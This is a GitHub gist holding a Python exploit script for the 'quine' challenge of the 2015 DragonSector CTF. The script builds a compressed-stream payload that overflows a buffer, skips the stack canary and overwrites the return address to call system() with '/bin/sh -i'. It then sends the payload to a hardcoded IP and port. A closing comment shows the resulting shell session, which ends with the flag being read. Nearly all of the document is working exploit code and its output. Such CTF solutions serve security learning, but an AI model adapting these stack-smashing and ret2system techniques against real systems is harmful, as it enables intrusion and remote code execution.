Skip to content

Instantly share code, notes, and snippets.

@g05u

g05u/quine_xpl.py

Created April 26, 2015 19:17
Show Gist options
  • Save g05u/990cc267c0ea1455e39a to your computer and use it in GitHub Desktop.
Save g05u/990cc267c0ea1455e39a to your computer and use it in GitHub Desktop.
Download ZIP
DragonSector CTF Quine Exploit
Raw
quine_xpl.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
# DragonSector CTF
# exploit quine
# www.null-life.com / @_g05u_
def n2h(val, nbits = 32):
return ((val + (1 << nbits)) % (1 << nbits))
def b2b(bits):
size = len(bits) if len(bits) % 8 == 0 else len(bits) - len(bits)%8 + 8
bits = bits.rjust(size , '0')
bytes = ''
for i in range(size, 0, -8):
byte = chr(int(bits[i-8:i], 2))
bytes += byte
return bytes
def n2b(n):
return bin(n)[2:].rjust(4, '0')[::-1]
def p16b(n):
return n2b(n & 0xF) + '1'
def p_byte(byte):
return p16b((byte >> 4) & 0xF) + p16b(byte & 0xF)
def p_int(size):
return '0' + p_byte((size >> 24) & 0xFF) + p_byte((size >> 16) & 0xFF) + p_byte((size >> 8) & 0xFF) + p_byte(size & 0xFF)
def p_chr(c):
return bin(ord(c))[2:].rjust(8, '0')[::-1] + '1'
def p_str(s):
out = ''
for c in s:
out = p_chr(c) + out
return out
def _copy(offset, size):
stream = '10'
stream = p_int(offset) + stream
stream = p_int(size) + stream
return stream
ret = 0x8048A37
system = 0x80486A0
def gen_overflow():
out = p_str('A'*32 + 'B'*16 + 'C' * 8) + p_str('/bin/sh\x00')
i = 6
while i <= 10: #2 ** 10
out = _copy(n2h(-1 + (2 ** i)), 2 ** i) + out
i += 1
out = _copy(n2h(-1), 2 ** i) + out #skip buffer of 2048 bytes
out = _copy(n2h(-1), 2 ** (i + 1)) + out #skip buffer of 4096 bytes
out = _copy(n2h(-1), 5) + out #skip canary stack
out = p_str('B'*12 + struct.pack('<I', ret) * 5 + struct.pack('<I', system) + 'DEAD') + out #overwrite ret
out = _copy(n2h(-1), 4) + out #skip a pointer (first arg of system) of stack address
out = p_str('//////////////////////////////////////////////////////////////////////////////////////bin/sh -i\x00') + out #overwrite arg of system
return out
s = NullSocket('95.138.166.12', 31337)
s.readuntil('size: ')
s.writeline('2048')
s.readuntil('input: ')
payload = b2b('00' + gen_overflow())
s.writeline(payload.encode('hex'))
s.interactive()
'''
$ id
uid=1000(quine) gid=1000(quine) groups=1000(quine)
$ ls -la
total 76
drwxr-xr-x 20 root root 4096 Apr 25 06:46 .
drwxr-xr-x 20 root root 4096 Apr 25 06:46 ..
drwxr-xr-x 2 root root 4096 Apr 25 07:14 bin
drwxr-xr-x 2 root root 4096 Apr 10 2014 boot
drwxr-xr-x 3 root root 4096 Apr 25 06:46 dev
drwxr-xr-x 61 root root 4096 Apr 25 07:14 etc
drwxr-xr-x 3 root root 4096 Apr 25 06:46 home
drwxr-xr-x 8 root root 4096 Apr 25 07:14 lib
drwxr-xr-x 2 root root 4096 Apr 25 06:45 media
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
drwxr-xr-x 2 root root 4096 Apr 25 06:45 opt
dr-xr-xr-x 81 root root 0 Apr 25 14:49 proc
drwx------ 2 root root 4096 Apr 25 07:13 root
drwxr-xr-x 7 root root 4096 Apr 25 06:46 run
drwxr-xr-x 2 root root 4096 Apr 25 07:14 sbin
drwxr-xr-x 2 root root 4096 Apr 25 06:45 srv
drwxr-xr-x 2 root root 4096 Mar 13 2014 sys
drwxrwxrwt 2 root root 4096 Apr 25 07:13 tmp
drwxr-xr-x 10 root root 4096 Apr 25 06:45 usr
drwxr-xr-x 11 root root 4096 Apr 25 06:45 var
$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Apr 25 06:46 .
drwxr-xr-x 20 root root 4096 Apr 25 06:46 ..
drwxr-xr-x 2 root root 4096 Apr 25 03:08 quine
$ ls -la /home/quine
total 1744
drwxr-xr-x 2 root root 4096 Apr 25 03:08 .
drwxr-xr-x 3 root root 4096 Apr 25 06:46 ..
-rwxr-xr-x 1 root root 1754876 Apr 25 03:08 libc.so.6
-rwxr-xr-x 1 root root 9692 Apr 25 03:08 quine
-rwxr-xr-x 1 root root 48 Apr 25 03:08 yes_this_is_your_flag
$ cat /home/quine/yes_this_is_your_flag
DrgnS{n0w_y0u_c4n_d3compr3ss_wh1Ie_u_dec0mpreSS}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment